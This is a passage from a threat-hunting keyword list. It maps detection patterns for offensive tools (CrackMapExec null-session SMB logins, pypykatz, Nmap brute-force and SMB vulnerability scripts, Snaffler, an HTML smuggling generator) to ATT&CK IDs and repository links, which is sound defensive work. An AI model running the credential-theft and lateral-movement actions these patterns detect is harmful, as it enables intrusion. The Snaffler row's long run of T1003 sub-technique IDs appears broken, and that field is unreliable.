--options*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* smb shareenum *smb2+ntlm-password*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* smb* -u '' -p ''*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* smb2-capabilities.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb2-security-mode.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb2-time.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb2-vuln-uptime.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-cmds.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -* smb-double-pulsar-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-enum-domains.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-enum-groups.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-enum-processes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-enum-services.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-enum-sessions.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-enum-shares.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smbexec.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* smb-flood.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-mbenum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-os-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-print-text.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-protocols.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-psexec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-security-mode.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-server-stats.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smbsr.db*,offensive_tool_keyword,SMBSR,Lookup for interesting stuff in SMB shares,T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Reconnaissance,https://github.com/oldboy21/SMBSR,1,0,N/A,N/A,2,138,24,2023-06-16T14:35:30Z,2021-11-10T16:55:52Z -* smbsr.log*,offensive_tool_keyword,SMBSR,Lookup for interesting stuff in SMB shares,T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Reconnaissance,https://github.com/oldboy21/SMBSR,1,0,N/A,N/A,2,138,24,2023-06-16T14:35:30Z,2021-11-10T16:55:52Z -* smb-system-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-conficker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-cve2009-3103.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-cve-2017-7494.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-ms06-025.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-ms07-029.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-ms08-067.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-ms10-054.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-ms10-061.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-ms17-010.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-regsvc-dos.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-webexec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-webexec-exploit.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-commands.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-log4shell.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. 
Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* smtp-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-open-relay.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-strangeport.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-vuln-cve2010-4344.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-vuln-cve2011-1720.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-vuln-cve2011-1764.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-vuln-cve2020-28017-through-28026-21nails.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/nccgroup/nmap-nse-vulnerability-scripts,1,0,N/A,N/A,7,620,64,2022-03-04T09:08:55Z,2021-05-18T15:20:30Z -* smuggler.py*,offensive_tool_keyword,smuggler.py,HTML Smuggling Generator,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py,1,0,N/A,9,3,228,42,2023-06-14T02:13:19Z,2023-01-15T22:37:34Z -* snaffler.log*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - 
T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,0,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -* sniffer-detect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-hh3c-logins.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-interfaces.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-ios-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-netstat.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-processes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-sysdescr.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation 